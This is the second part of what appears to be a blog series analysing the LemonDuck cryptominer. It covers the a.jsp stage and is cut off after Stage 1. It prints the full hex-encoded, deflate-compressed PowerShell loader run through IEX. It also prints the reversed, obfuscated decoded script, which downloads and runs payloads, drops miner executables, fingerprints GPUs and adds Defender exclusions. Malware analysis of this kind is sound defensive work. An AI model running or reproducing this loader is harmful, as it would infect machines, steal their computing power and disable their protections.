Malware Analysis:Lemon Duck CryptoMiner (a.jsp) : Part II

This is the Second Article where we will be analyzing the LemonDuck malwar, [earlier] we analyzed the “mail.jsp” script which resulted in downloading and invoking of another script named “a.jsp”.

You can find resources related to the malware we will analyze from this github repository.

⚠️ Any domains/URLs/IPs or Scripts discovered while analyzing malware are malicious, I defanged these URLs to prevent any accidental click, Don’t Try to visit these Domains or run these Scripts on your host machine, always use a Sandboxed VM to perform experiments

Stage 0

The LemonDuck malware has various phases and stages, and for them it had different scripts like mail.jsp, 7p.php, report.jsp, a.jsp

We already analysed mail.jsp script,

We have the Malicious script a.jsp with us 👇🏻, Which we extracted in the last article.

IEX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('edbd07601c499625262f6dca7b7f4af54ad7e074a10880601324d8904010ecc188cde692ec1d69472329ab2a81ca6556655d661640cced9dbcf7de7befbdf7de7befbdf7ba3b9d4e27f7dfff3f5c6664016cf6ce4adac99e2180aac81f3f7e7c1f3f227eb7dfeb60796f96a69f7d6f3a3f7ef5bdef7f3ffd28bd73e7d37bdf7f95cda7df1b7dfce6eaf4e3f4f4e4f8f92aafb7d387f6f3b3c54ff1e7e5cbfcd5c9769adef9f8374e7ee324bd93ded97b486dbe4d6dee3cfc547efbe4defd8f3ff9d8fcbebbfbfd57f427fed84a4fa7c7e5ea9420efdf93efe99b11c13efefc3bf42f7dfbfce5693dddfed4c2dca1067bbbdfa77f05dc01fdb6afa0777676e5b72d7d91bea37715b2c3873efe64e7be79e981bea3b8d09766a07889b078ba772ab828a67bda0b21b3abbf3244d3fb270f0e4290f5f69d336ab1f82990e8374e686cabe6a7c76d5d114def96f5faf7cfeb6a7abaf78cbe487fefd3b3d768742f6d66cb6a9abfde4e57795ebede26143ea1ffb775d672835fc2fffce2f9b4cd30ccf497fc187ff063e607ffbcd3e4edf5e4f7bfca6a02fffdef7fafc6e42d0b7aa1fae9ed2d744650e92ffa71f663face2fa6f9bfceeafa18afd26ba3dd6cdee0a7838539a0ff3fdbcadaece9f57951e797e3ac411f5be78582a9f3597159d52ff329b52c2eebfc75d5aeaeeb93dd63fafbdbafc7d7f355565fc867e3ebb6a875806b1af37891eb5fd4b6a5ff37d7afd3769afff4e4cbedabfc45fa59aa389961ee7f9a371921cb485d2cd163ddbee64f9f2caafad9a347df6f094922e8f7e8657f7421a1961745a33d2bc1c0a944b3ad654114a37709a636e00ef9779e5b8144bf02d822abb397a00828f56caba9f336c767faea4bccfde24c69a6281c3a8a815cf4a652ecf8f5ab3eb5944c2d2843a05fe42b857dfd663b2495e9d4ef6b77e7ddce6807ffe0376ad42ecdb096d5eadde91834d741e8e7dedbb3fbf4e2e453fae7c13efe99d03f07f7e89fcc00c1a70fe99f3c43cb07f4cf3e7ebb87770e0ef0ed39fd737f663e9be1cfbd07d42bf0dac577fcfa1efda3203f459373f4c2902778f700bf61863092c914efa2410e900ff1db397f86a67bc0343f7847ad0df04cbacbd07a179f3c008e3b68f81028cfa6d27a0ff8ece500675b6518c4010fec9e376674f72097d766f88309bd077a7d8a3fefe18d9d7bd2f1c35df9b93b73102618f10cad26960007a0ef145852fb1c78ece1bb3d26218f9227001841d630da1d1e137edb05f2423b0cec53203f43fb1cdf66408ac9f5a992f20110fe14b07680c51ebe9b7027fb32ac7b8025934f1fd3473c50f373b4837f667881473dc56ff7308a9c2700dd7f8a9e1f30e05cdebccf0c85fe78988c10932a0356f7ee9b3fcf791c7b4236fa030809ede8b79f1aed01ed195e79c8c4c37bbbe8760680538c5a78877f53a2331f01adfb6894cd18239288665dae67d517631103305943ff78526085fa250ba8d30422aad05c24adf4a32fb09e7cd2f79fe11fa73200e86356c9dc156b14d20edf6f97eb6a3a163dd5e440643cbef76017b6c7ff10a8ebd03cdd2f98e143a36dbebffb60773cdef99ebc6b74840561d5a11bf02fbe43dda5ed05e9971e2aacf75991923d2bb365718e4e05285b89595695cbabeae998344d514e27f995df910051dbc5360d064d00de794ab8ef9d6e93191ed1ff4fefff22854b7f6ce5d3ac349a2fafc76fa7eba7bfffb25ae4cf09dc27644fb7f1c9367f427f8de8ffd4ffc5f1769d375fd11f5bb35936a6899c65f9b7c70ac647d08cfcba6e7fecc7f47b35e1e006ccd94a0c373afb3df4279140ad39cfae471101c73dbcdb999d4cf2ef8e5b6202e207fa9359827eb2d60eb1b0483045f85fe9e4fb174bb274cdf7f8a32de621fe354d7f31bb12e9b22adae9727dce2f124abf90fecfb60c7f3c1cef802ab04684e9aa8095cf173ace6cb96af1c1aa5894f879fefb9f2fc1d553316ac48f67df1be5227a68bf28da1550320abb9e2ff475fcb85c9ceae7f407fa36787cffbe7e3e1eef7ccffc3e5b4070dea2dfad4e6b6aa68dbe777fb658749ae857d492dee7c6dfd38fa8f17981d6862b47702c8a459d6306bf6f265f7f626cf4cdef4f4dd62bf866a345be308313e99cd5ec7809cdb2a536cb2f8bdae873fcbd2cb24535c36fc4726bef8bfd4f1bd05bc8d854ea4a901fb1f57b6e81897e21013ffe9cfef9ce679f90723044657ef3c4e497907cec61461e8e1f8ee507fd2b22a3ef406a0ec6fc9f7e02c9f93db7a0cef259fde57c5a67f96b728fc8477bfde2694b7aea4ebeaedbcf667939c996f9aa4849d595c5f936735356af2f0a6285297db8ca66d9dbbaba6af3e5efbf776f595ca54d939553f540aa6271b5dde6175b605de7b3a6f4e017cc7096d793541f7cf6fdbdefe54b9e26c800f12533a5dfe217dfb9332b88339909d35f946fa7dfdfdd362f6da5b365b69d821d9e9e7efbf5d9f327c76f5e9f42d01b9a8896901e83a7495b113482900a42f97a59e0cbf417e3b33b65b95ebaf9e03ee40fb0baed89fe603002039c421fffe2f4f74897b3ef624e5250b92dac7a82c2e0de6964f0ee749876584b426035e506cb226534e753a24fc5b22b0cfe9925093e7b79f20658ac2a8cb9a5b8a065d5e100b1d0ff1274460cda34f9b4aa57e3dfdf0d6d342bf0e7336225c360e88f06b00bc06d5363d28d68f0946ed38f326fa8c98588014b4b315bb29fdfe44fb75392044c1dda689fda6cbb75da827e12637c96e303a369785e95bb53566cafab3704a29ecd8e5f9e31a669359fe6bf3855c280d43cd90b9ad85ff416ecffe964bce2f9cef5c51674afbedde69f5310d02c9f42e14250c4147fef33566fcc4ce87759353f8d79a2ffeffedebff7ef7da19833bf93e5d919ef5ed28fb2348eee9ce4e6aa7ad95c55b365f15dfa6aef1e036ee857f9f08a7e7b344de7d036d96abb2583f719ab52d04b474bb344ccb20d8ef924b7b2be64a3f8097d888066f65d23f1bfe417dfd9ddcacb627e7578670bf160338695a636870ff7eedffff4fb75be241c8ae7abe91b76e4dbfcedb47a8d5f55bd311fbf606f04246804134829d3f7a9551d5be9aa6dace4deb90345c758e9f7e96475b1f5c99d6531a9df627648c9ca2ffbf98c43daf47c7ab1c550d485805effbdca6c0a4bc272c46284efec2b70eb4ec90e9e29dfd7bf174ca9171152bb8bcf4c73a757d45d008ee02ef6642c834ee8a30b68f0343328cb9f84b2fc72af8fb2e27cb1fce20d50667cc9d1c1a7da9aa012c28c2d7f7cac1d7efe1dbcc47833b606b809117ff11dd5ffaab032f9a3ae48c7f2af5bd4d1c7e2fac9e8e80f6f8039e888373e862299c8c0e877d8711d9e8e4e11c29cf3277b83c3b4a36469d8e217f1d64fe990ed9bfe78c9e8fae3441b375153fd5506ee8d7aeb9cbe2dece03cc6721c75ce14711e81fcbddb415fbfb6fc757ee6cd143eb22fbcf379eafccce10c59c76f0e6f9fad4818aca9154bfb4909570e7269bafafe795e7f0f6656fee71a80c9a9cdf31c4a239b54e5e7d26204fb0a1cdfe5edfa8b31e93af240ebf91b1719d09b2f0e297d010880f65900d7740c91a53f65ec1fb3ed42932d1e58e0fb99b18892817c10c54ff79eb17a99d1dfdfbdb3643a7ddf66899022fabd4f39c89a9dc1a089cd143a7b8a44006dd1c4718f4a4674ec3330d13b7f978fa93130247afceeab45fbbba7bf308d7d5ad495ff9982e4afaeefa6d72b32d5d3bbe96c31fd85e9762a08689b676412e08663ae7ee1eff7fbfd7e2036a1e154da2f7c6ac2065612d08a77a401bda92fc81fb621b5324d0ae48c38687972fa721be4d885463fbc7387d27f1c175132941cbe65f68a3c9fcfe10a3cd8a3380ba1fed6d627bfbf0018add8992423451f13a8b2a47414c4bdfe2e192952edcfc65f9e19f57ce8f88a06165246c78401db56fad92744ad4797500f39d8477a2483912fabf2642c787ca6f81cea3b34087e76b77884c493afc677eedc81255d9189cd9f023b0a8a699af53382c4bf0377fef3cbb3ef799a231dddb9f3fd3b122e0a7b6d8dc777763f611df03df96444614b5ec33cbebeae2950fbc28d9dc40193f4d38a9e84cc5b29b77fbd2a7ef03966cf22a3ad18897ea4bdc551deabeb3ae3fce7136a64bed517d1e83325c89def0345840f1af3b07d0d65e31d82b6e2f097fc92b70a00ceec2fbe0391dd912c027ba700f43d6bee492b91f9fe8c2970b8bbede2722212fd6ee994b6e576ca8d763e13a5c47e082090e303d6548527dc4fdf5388227cb195a92406b20f0e563c3dd1784a52c27c8e412aabf74501ea219006fae397fcfe6439c143f755351ffefe4b1e003e9331fce23bab7505dda06e9f604014f8258ac82fd9fd4c5bfce2bcc167d2a2cc7f892aa3d18a410b3b96a56177121691146aafc2f2b1f5e87ef11d8311911ff225543f54bac2de7f86cf0e310a15ac8f9180a17f349e8730fd1ef89ce989bfee5ac1c248f055090bbcfefd29a781e84e3143aa63a6a98ed9f84e10e83ba98885fc5b5d9afdaea0131188de3034f207a6d4c7c07e7f7f64bfff7d7a81bf3aa45fee84f43b8604f435cc670ae1176b737256d553050e8d0bdcd365bd6e59d60f7f89526fef9dfcdc32fe3abbe914b29e4a58a1f104e653c1009f79937d9b75df9a94c6c7489191626aa9f1096177ffe9171bf3dd34c3aa4b3062cbe94689019f8f11feca2cd11439f991c9a20935b8042af3336e2d6d3cad6b9980142e7f645e16154bfa15dd918a1531702ff23438c5ec2445f0fb443d13b450bf1b3a82fe6f649b7b1e3198113776ea02531f33f1640a887098c4e95db8381cfe14cf891317eb8bfa789bcd2d194ecc31b29a6085ed54e2b497dbbcbac49d33101d28541f01aae6db10bc2b17b252a38f45abad8cd96f8092fe6e31337402078987a0f3013786ec2487188abd4b504d331e387bb0a2188af505938214ddef0f83843f2ed1fdef0931e114aa498f7c7ff77b080c9192e320bc194bc2ecb34b6d40a2254e372514902ef8e298d8745991917805bac1e35b6ca794e4614e5367925e5a7a2f9d9ebcfaf2d929acfcf1d9d3b39f7c41bffcde6f3e3fe6b54b0ccf408148426a0cac8fd9f9d5463695439f1ac588be304afd933de320fca4b8d37ce7859ffa51240a25d81a88ea54c36aaecbe93b7208f329b9de39b9b02f8d37fdc53605ce669a4d3fc437e8b841c0ab9fad1c4efa89a076bb90d862a2efc610624c98214d189d4550071f078d77397d50b5c5b2fa22a7c4646957a65e21a7d5144ff55d3338ed8c725f36d7caf36d3cff8fd9fd83359495c0326b0ddaed9834574d1a6d3ea6fc08584c329f36d7811fde6caf8a311b4acc095901646bcc8b922b45c7ec75140d1656f5bb4bf315127e903af264168b757377f7eec34f3fbdb7ff6877bc43ff91b779f7eea3550b7f6a0e741d374aaa98ac137dc5068abe1a5b1b855c33e54696d63255d62f82815a6e6d89b794ffa028335af1a554cff84e6dfe7addae8a7afa3abbccbe038fb0cdcce763f9624c16d077c6284d25e3e21111228d4b0de9d82987410b91b09ca2f621c958e924b846d950b67bde16dfa5213d27bb715d4e0083123fc78c0325aacef357581fe94c297dc2b30a4d03d144c0202ae7977c7fe77b77ee882d6b7809679cafaedf5052d7f4f894eddb96fe098ffcf787f78df7809c7c6b0c1fe7a77e09ab8abd7b6f8e7949e017c1ee215db7a8ab67c8162b448efdd1f2f5b3372fe8c7c7ea3f860d3fe6d0dca439d15cd2af2f3e46b6d84257a42d6c281f050ffebf2437fb9534e7817c0cabd279eb632ca573470cf1cefede8e2cfe9013b87a9de7f533402a8becf2d83617b4aee1653492affbc529c9e7fc0a845092a51a3afe143925e88b1373f4f6f7c94f3893de8d67d27c0f7c429f01fd99328b99c7c9e7bb7789fd15187ba292a23ffc2529390c8464762229c3cf3e49a921273f7e71fa4bb0daad7ffee2df9d2748a20ea3c0b269d15ccf611a39a3fddd9492d8176a9beee4179444cea7bc3aff126c472250b11e33fcf152df421efc443f0c53a85f168bef2236dcda3a9545a2cf52b3d240ffe75504a3fe21606559d5949b3e21cb54fc2401ff18091f234b0614c1504be5bd0afed504ac24e7cd0cf8c9f90b2631af5f7c2c710e0b493323b594375073edd8e4b63d778e23ddb7d3e20dc91d7c8b65551764e1bfb7d5c0d0f1bb4559165fb077573fa356cb6cd540157f8ffbd3b522567505386c414b83d0b20ba3a831ffb5fe01cdc0aee2540602d9f8d866337faa4b0abbe672661d0db6205f1cbf7875fafa2b709b7a23207d6311a9a0707f723cc16acc332bda2434da0f32f0482660d2ac59fd2e63725e35553d2dbe38a63f6c731b2f411b81bcc49113562bd237f7c30a50341ca91db224f9ea4b10dcb111965330373c4ac3efe8d98c9711fed886770c926455ff94247e90bd67b697fc7836cdbe18d31a81e4a3d29f20a36a977dba129c3a53ddda0529590c3ae1c520c26176ac0a49e5c0f0a98faf3876c0f22954cf575f51a434a5c5f6faa589e1991c0412737e0248d4cc00ab7855e9635e3f00df8b53e826f8cd572fbff8f244fccd8f919e15fe360ea33138e41d64a4e48b65b1981df3b47d27fdbee9beac5e2dcf68c96bfd44e6593fffeeb8cc56c594acc34b0e4a20b314977c6f4b5e68380c25fbd13acfa25e9fc8d203b5a78f6767ea1759486ede5eda40e77bdfff188943edaafb866b47ad5845b66619d37ad1776544b2660a6e422ae38efbc2fac46b3129292f53fffe24de56051ccbb2cac33554ce64326ec5af98d3e79f892ffd8bef48107c2ad1aa76bdb091de78adbfcc7efaeae0c17a3c7310b43f0db63429feb1586acfed02c66671811c409be3a170427fb32eb22853322aa60905bc8eb6ddd097c8a6df70d4cceb1626a11ac36021bcc438985886bb031ffab135fdedf5618063995afb433035d40b4787fd3ea2c1bb075dd6b50dd0635e291c053fa84f334645832227b37c3eb2208cf1a869d1f6339b92674cf9ab8f79219135a7213f1202b55d053d9624af8913b451b572cb2202969987bd11fd8b068da4432d43d6d6f0f6a94b4d4580c54c4758a1dd6e292d42be1bf3730c8ec8343aa1df182b173e6b1cb332edb5c78f5935833f492317dbd7e89d72cddaab8e0e5f7f02ad7f0706ebd3dffd8ecbf76e7df2e956aa993c9708361c29f960c308480b3f78f8c9cec3f1f8fea79f3cb83f1e1fec6f7d5f338c5bacf148782dbd2c8d835fba411a1aebef78c74d0f1efe8249e04278981a4e2581bd3128f89cf4815b26b77d74260c6d95d67857f5ca066655bc3849c5390d1f2dc2097dfce23b8d1d30ad829bdfcd4ab86deb63240c47dd7b734a7f3976b248d1a75121226d74df1147066fc9ccde145b42e7ff04c1f08ad6914c3c4a9f138c6fc927cbb3ed54c8f2ad90bfd3628a3edd50b52ffa8ac2e99fd4105f80f7e26825c16b1b4ee3bb472750cbdeb0dd0c23686289ee278b4a2633f3c88f2958fe0eb93d4eec75b37a6548863b50de92cc13531da6f1089b2fc60a379ad0fbde8f7d6cd693185290cfb3587ecc1ed7bddd834f1f4eef3f78b03799eeddcfb34f1fe6f7f6f61eee650f1fcc76a69fee61fc662dd72e4d1693f1c5a70b7c25ebbd1fc3d6996fefcd1e66d97dc5effef4febdfcd34fe1bdceceb3fcc1cede6ebebbb393ed3cbcb7774f61ab947cac2bb1da01c1e739fe4ccc84b7d2a9a065c1d398c74f33ea749acd0e0eee7d7aff60f7c1f9eea7f7763ffd74ffc1ec7cba9b3d982830b392ee7554bfd581785f50e3ef9c7f9a9f9fef660f67b3fbf9fe03ed74e7fcdefebdbd1d4a07dc3382373b7f78bebfa3636153f31b27bfb1017e5e2870fbc59d038e3ff31f4013bd7ee4e4e3d1f7ebf665bb24e121d7bff8de67baa64b0d285edc4aa114e97769fb022ef2973fadeb1cef00e4fbf746949bcb4f96a7af4ecf4f5fbdcc9b2f9fbca2af4f2fdf5c9d7eff7362b837e451a55be3f46385474b90dfbfb7fbbda767cf915dfadd3ea1dcdeac785e9e7ebbf9ddd2ad5ff8517a987eeff8d5abecfafb8f1ebdca2ff3bac9b7d2dfededc1f2ded33bf4dd9860fc6e97f9ab275fbe3e5dd5f9b3d33a7f71928fdf7cd9bc79552c2fb6ee7c6f7774effb64213edefece97672f3efef80ebdf051fabb6da5cd4fa61f57e7af29d6a0cf3e229dff3d79e5fb0efc276848ea65fb32ab8be3c9f39c9648bf3c6fe815faefce4777d2df38f97f00'-split'(..)'|?{$_}|%{[convert]::ToUInt32($_,16)}))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

This seems to be encoded script Let’s Decode this, and see what it does

Stage 1

After Decoding the Script we get

$K8n3d  =[chAR[]] " ))63]Rahc[,'TwE' ECALper- 93]Rahc[,'ImZ' ECAlPeRC-  )'

 ) )29]RaHc[,)96]RaHc[+35'+']RaHc[+311]R'+'aHc[( EcAlpEr- 43]RaHc['+',ImZAGJImZEcALPErc-69]RaHc[,)0'+'21]'+'RaHc[+8'+'4]RaHc[+001]RaHc[(EcALPEr'+'c-63]RaHc[,)96]RaHc['+'+05]RaHc[+07]RaHc[( EcAlpE'+'r- 93]RaHc[,ImZD2EImZEcAlpEr- 421]RaHc[,)011]RaHc['+'+001]RaHc[+78]RaHc[( EcAlpEr-)I'+'mZ

AGJpsj.troper/lru_erocE2FAGJ XEIS

3 sdnoceS- peelS-ImZ+ImZtratS

}

}{hcta'+'c }	

}		

}			

)setyb_warE2F]][rahc[ni'+'oj-( XEImZ+'+'ImZI				

{ ))yarrAetybE2F,1ahsE2F,setyb_warE'+'2'+'F(ataDyfirev.asrE2F(fi			

redivorPec'+'ivreSotpyrC1A'+'HS.yhpargotpyrC.ytirImZ+ImZuceS.meImZ+ImZ'+'t'+'syS tcejbO-weN = 1ahsE2F			

)46esabE2'+'F(gn'+'irtS46esaBmorF::]trevnoc[ = yarrAetybE2F			

)setyb_ngisImZ+ImZE2F]][r'+'ahc[(nioj- = 46eImZ+ImZsabE2ImZ+I'+'mZF			
'+'
)smaraPasrE'+'2F(sretemaraImZ+ImZPtropmI.asrE2F			

;redivorPecivre'+'SotpyrCASR.yhpargotpyrC.ytiruceS.metsyS emaNepImZ+ImZyT- tcejbO-weN = aImZ+ImZsrE2F			

10x0,00x0,10x0 = tneImZ+ImZnopxE.'+'smaraPasImZ+ImZrE2F			

d5x0,b6x0,74x0,7bx0,83x0,aeImZ+ImZx0,79x0,eax0,b7x0,4ax0,36x0,88x0,7fx0,5dx0,36x0,dfx0,27'+'x0,01x0,59x0,e2x0,ImZ+ImZ6fx0,f3x0,79x0,bdx0,89x0,'+'a0x0,bcx0,03x0,e6x0,93x0,fcx0,0dx0,24x0,e8x'+'0,59x0,ea'+'x0,a6x0,19x0,7ax0,04x0,97x0,dcx'+'0,21x0,2ex0,f9x0,7ax0,a8x0,87x0,43ImZ+ImZx0,7cx0,7ex'+'0,dcx0,10x0,25x0,6cx0,37x0,03'+'x0,91'+'x0,1dImZ+ImZx0,b2x0,d7x0,b9x0,e2x0,8bx0,c6x0,'+'eex0,29x0,2fx0,53x0,fbx0,88x0,c'+'dx0,06x0,1dx0,11x0,6fx0,f4x0,6ax0,dbx0,edx0,acx0,e6x0,69x0,'+'70x0,68x0,07x0,26x0,b3x0,f4x'+'0,3fx0,b6x0,73x0'+',dcx0'+',dcx0,0cx0,d3x0,25x0,c3x0,32x0,e4x0,eax0,6dx0,76x0,bex0'+',55x0,b7x0,c6x0,e6x0,37x0,a9x0,35x0,37x0,ffx0,f2'+'x0,ffx'+'0ImZ+Im'+'Z,28x0,d9x0,99x0,e5x0,14x0,d6x0,cbx0,79x0,bbx0,7ImZ+ImZdx0,8ax0,56x0,adx0'+' = suludoM.smaraP'+'as'+'rE2F			

sretemaraPASR.yImZ+I'+'mZhpargo'+'tpyr'+'C.ytiruceS.metsyS tcejbO-weN '+'= '+'smaraPasrEImZ+'+'ImZ2F			'+'

;]tnuoc.setyb_serE2F..371['+'setyb_serE2F = sImZ+ImZetyb_warE2FI'+'mZ+ImZ			

;]171..0[setyb_ImZ+ImZserE2F = setyb_ngisE2F			

{)371 tg- tnuoc.setyb_serE2F(fi		

)lrulanifE2FImZ+ImZ(ataDdaolnwoD.tneilcbewE2F = setyb_serE2F		

}{hctac }		

))D'+'2E-D2E,D2EE5qImZ+ImZD2E(ecalpImZ+ImZer.kcuD_nomeLE2F+AGJ-kcuD-nomeLAGJ,AGJtnegA-resUAGJ(dda.sredaeH.ImZ+ImZtneilcbewE2F			

{yrt		ImZ+ImZ

AGJs'+'marapE2FAGJ+AGJ?AGJ+AGJlruE2FAGJ '+'= lrulanifE2F		

tneilx0dCbeW.teN tcex0djbO-wx0deN = tneilcbewE2F		

{yrt	

)	

lruE2F]gnirts[	

(maraP	

  { XEIS noitcnuf

)AGJ&AGJnioj-)AGJ9.0AGJ,trop'+'piE2F,emImZ+ImZanptE2F,pimlE2F,f_fno'+'cE'+'2F]tnI[,eIm'+'Z+ImZmitpuE2F,ImZ+ImZrhmE2F,pimE2F,vmEImZ+ImZ2F,)AGJAGJnioj-]5ImZ+ImZ..0[5ImZ+ImZdmr'+'klE2F(,)AGJAGJnioj-]5..0ImZ+ImZ[5dmmlE2F(,)AGJAGJniImZ+ImZoj-'+']5..0[ImZ+ImZ5dmfilE2FImZ+ImZ(,t'+'imrepE2F]ImZ+ImZtImZ+ImZnI[,rep_'+'upcE2F,memE2F,ImZ+'+'ImZdra'+'cE2F,emanupcE2F,evirdImZ+ImZE2F,niamodE2F,resuImZ+ImZE2F,46siE2F]tnI[,soE2ImZ+ImZF(@(+AGJ&'+'AG'+'J=+smaImZ+ImZrapE2F

}{hctac}))D2E'+'9.9.'+'9.9'+'D'+'2EImZ+ImZ,D2E8.8.8.8ImZ+ImZD2E(@('+'redrOhcraeSrevreSSNDteS.)eurt=delbanepi retlif- noitarugifnocretpadakrowten_23niw ssalc- tcejboimw-teg({yrt

}

}    

'+'kaerb        

]2[enilE2F = troppiE2F        

{))diptE'+'2F qe- ]1-[enilE2F( dna- )AGJDEHSILBATSEAGJ(sniatnoc.tE2F(fi   '+' 

} eunitnoc {'+' )llunE2ImZ+ImZF qe- ImZ+Im'+'ZenilE2F( '+'fi    

}_'+'E2F{ ? ndW)D2E D2E(tilpImZ+ImZs'+'.tE2F = e'+'nilE2F    

{)nnocpctE2F ni tE2F(hcaerof

AGJAGJ=troppiE2F

PCT '+'pona- tatSteN = nnocpctE2F

)}e'+'manssecorp._E2ImZ+ImZF,di._E2F{hcaImZ+ImZerofndW1 '+'tsrif- ImZ+ImZtcejbo-tcelesndWg'+'ImZ+ImZnidnec'+'seD- upc trosndWssecorpImZ+ImZ-tIm'+'Z+ImZ'+'eg(=em'+'anptE2F,diptE2F

} gnirtSoTsserddAPI._E2F ohce{ hcaerof ndW )AGJmoc.qk'+'96b.pAGJ(sesserddAts'+'oHteG::]snD.teN.'+'metsyS[=pimlE'+'2F

nosj'+'.'+'1XXXgImZ+ImZifnocE5q0.1vE5qlleImZ+ImZhSrewoPswodniWE5q23metsysE5qswodniwE5q:c ht'+'ap-tset=f_fnoc'+'E2F

)D2E- D2E+emaImZ+ImZnerE2F+D2En'+'dW}{hctac}}{)1(elihw;)(trats.sE2F'+';92556]renetsiLpcT.'+'stekcoS.'+'tImZ+Im'+'ZeN.metsyS[=s'+'E2F{yrt ohceD2EImZ+ImZ( pts

}

))emanerE2FImZ+ImZ bpg(+)nibrkE2F 5dmrkE2F 4edocE2F fcg(( pts	

{)r'+'Klaco'+'lE2F('+'fi

4edocE2F x'+'Ex0dI

AGJrKAGJ eImZ+ImZ'+'docg=4edocE2F

}

}	

))eman'+'erE2F ImZ+ImZnib'+'gmE2F apg(+)nibgmE2F 5dmgmE2F 3edocE2F fcg(( pts		

{)gnMTlacolE2F(fi	

3edocE2'+'F xEx0dI	

AImZ+ImZGJgnMTAGJ edocg=3edocE2F	
'+'
{)46siE2F dna- )asiE2F ro- nsiE2F((fi'+'

}

}'+'	

))emaner'+'E2F '+'nibmE2F a'+'p'+'g(+)nibmE2F 5dImZ+ImZm'+'mE2F 2edocE2F fcg(( pts		

{)nMTlacolE'+'2F(ImZ+I'+'mZfi	

2edocE2F xEx0dI	

AGJnMTAGJ edocg=2edoImZ+ImZ'+'cImZ+ImZE2F	

{)46siE2F(f'+'i

}

))emanerE2F bpg(+)nibfiE2F 5ImZ+ImZdmfiE2F 1edocE2F fcg(( pImZ+ImZts	

{)fIlacolE2F(fi

1edocE2F xEx0dI

AGJfIAGJ edocg='+'1edocImZ+ImZ'+'E2F

}

D2E}{hctac})D2E'+'+lfE2F+D2ElacolE2F]fer[,D2ED2ED2E+lfE2F+D2E'+'lacoLeE5qlabolGD2ED2E,eurtE2F(xetuM.gnidaerhT tcejbO-we'+'N;esa'+'lfE2F=D2E+lfE2F+D2ElacolE2F{yrtD2E	

{'+' )lfE2F(edocg noitcnuf

}

D2E- D2E+'+'emanE2F+D2End'+'W)nocE2F]][rahc[nioj-(XEx'+'0dID2E    '+'

{)ImZ+Im'+'ZemanE2F(bpg noitImZ+ImZcnuf'+'

}

AGJexe.manfE2FE5q%pmt% & exe.manfE2FE5q%pmt% iro.manfE2FE5q%ImZ+ImZpmt% y/ ypoc c/ dmc& - emanE2ImZ+ImZFndWAGJ+)D2E&^^^D2E,'+'D2EImZ+ImZ&D2E(ecalp'+'er.'+')'+'D2EndW^^^D2E,D2EndWD2E(ecalper.)'+'D2EnibE2F setyBEP- '+'1tset;))001 tnuoC- modnaR-teGndW)721..1'+'((+_nibE2F,pemE2F(se'+'tyBllAeti'+'rW::]eliF.OI.metsyS[;D2ED2ED2E+AGJiro.manfE2FE5qImZ+ImZAGJ+D2ED2ED2EImZ+ImZ+pmt:v'+'neE2F=pemE2F;)(enolC.nibE2F=_nibE2F;ImZ+ImZ)00000001(setyBdaeR.)))sserpmoceD::]edoMnoisserpmoC.noisse'+'rpmoC.OI[(ImZ+I'+'mZ ,))])tnuoc.nocE2F(..)1+iE2F([nocE2F,(maert'+'SyromeM.OI.metsyS tc'+'ejImZ+ImZbO-weN( maertSpizG.'+'noisserpmImZ+ImZoC.OI.metsyS tcejbO-weN(redaeRyrani'+'B.OI tcejbO-ImZ+ImZweN(=nibE2F;)]iE2F..0[no'+'cE2F'+']][rahc[nioj-(xex0di;}}kImZ+ImZaerb{)a'+'0x0'+' qe- ]iE2F[noc'+'E2F(fi{)1=+iE2F;1-I'+'mZ+ImZtnu'+'oc.nocE2F tl- iE2F;0=ImZ'+'+ImZiE2F(rofD2E(	

{)emanE2'+'F,manfE2F(apg noitcnuf

}

)'+'ImZ+ImZD2E&^^^D2E,D2E&D2E(e'+'calper.)D2EndW^^^D2E,D2End'+'WD2E(ecalper.)D2E}_5dmE2F=5dmfiE2F;_n'+'ocE2F=nocE2F{)puonE2FIm'+'Z+'+'ImZ(fi}ImZ+ImZ}1=puonE2F{esImZ+'+'ImZle})nocE2F,pfiE2F(setyBllImZ+ImZAetirW::]e'+'liF.OI.'+'metsyS[{)5dmfiE2Fqe-'+'tE2F(fi;nocE2F 5dmg=tE2F;)D2ED2ED2E+'+'sm'+'arapE2F+D2E?D2E+nfE2F+D2E/D2EImZ+Im'+'ZD2E+lr'+'u_nwodE2FImZ+ImZ(ataddaolnwod.)tneilx0dCbeW.ImZ+I'+'mZteN tcex0djbO-wx0deN(=nocE2F{)puonE2F!(fi}}1='+'puonE2F{)5dmfiE2Fqe-_5dmE2F(fi;_nocE2F 5dmg=_5'+'dmE2F;'+')pfiE2F(setyBllAdaeR::]eliF.OI.metsyS[=_nocE2F{)pfiE2F htap-tset(fi}sEImZ+ImZ2F nrute'+'r;})D2ED2E2xD2ED2E(gnirtSoT._E2F=+sE2F{hcaerofndW)nocImZ+ImZE2F(hsaHe'+'tupmo'+'C.)(etaerC::]5DM.yhpargotpyrC.ytiruceS.metsyS[{)nocE2F(5dmg noitcnuf;ImZ+ImZD2ED'+'2ED2E+lru_nImZ'+'+ImZwodE2F+D2ImZ+ImZED2ED2EImZ+ImZ=lru_nwodE2F;D2ED2ED2E+nfE2F+D2EE5qD2ED2ImZ+ImZE+pmt:vneE'+'2F=pfiE2F;D2ED2ED2E+dmE2F+D2ED2ED2E=5dmfiE2F;D'+'2E+edocE2F+D2E ohceD2'+'E'+'(	

{)nfE2F,dmE2F,edocEI'+'mZ+ImZ2F(fcg noitcnuf

}

AGJargE2F c/AGJ ts'+'iLtnemugrA- exe.dmc htaP'+'eliF- ssecorP-tratS	

argE2ImZ+ImZF'+' tsoh-etirw    

{)arg'+'E2F(ptImZ+ImZs noiImZ+ImZtcnuf

pmt:vneE2F noitImZ'+'+ImZacol-tes

AGJ&AGJnioj-)camE2F,dImZ+'+'ImZiugE2F,eman_pmocE2F,vE2F(@='+'smarapE2F

]1[)AGJ?AGJ(tilps.lruE2F=vE2F

}1=asiE2F{))AGJDMAndWnoedaRAGJ hctam- dracE2F((fi

}1=nsiE2F{))AGJECROFEGndWAIDIVNndWXTGAGJImZ+ImZ hctam- '+'d'+'racE2F((f'+'i
ImZ+ImZ
}{hctac'+'}ImZ+ImZ

emanImZ+ImZerE2FE5q0.1vE5qllehSrImZ+ImZewoPswodniWEImZ+ImZ5q23metsysE5qswodni'+'wE5q:c ssecorPnoisulcxE- ecnereferPpImZ+ImZM-ddA    

ImZ+ImZexe.llehsrewoImZ+ImZpE5q0.1vE5qImZ+ImZllehSrewoPswodniWE5q23metsysE5qswodniwE5q:c ssecorPnoImZ+ImZisulcxE- ecnereferPpM-ddA	

E5q:c htaPnoisulcxE- ecneref'+'erPpM-ddA	

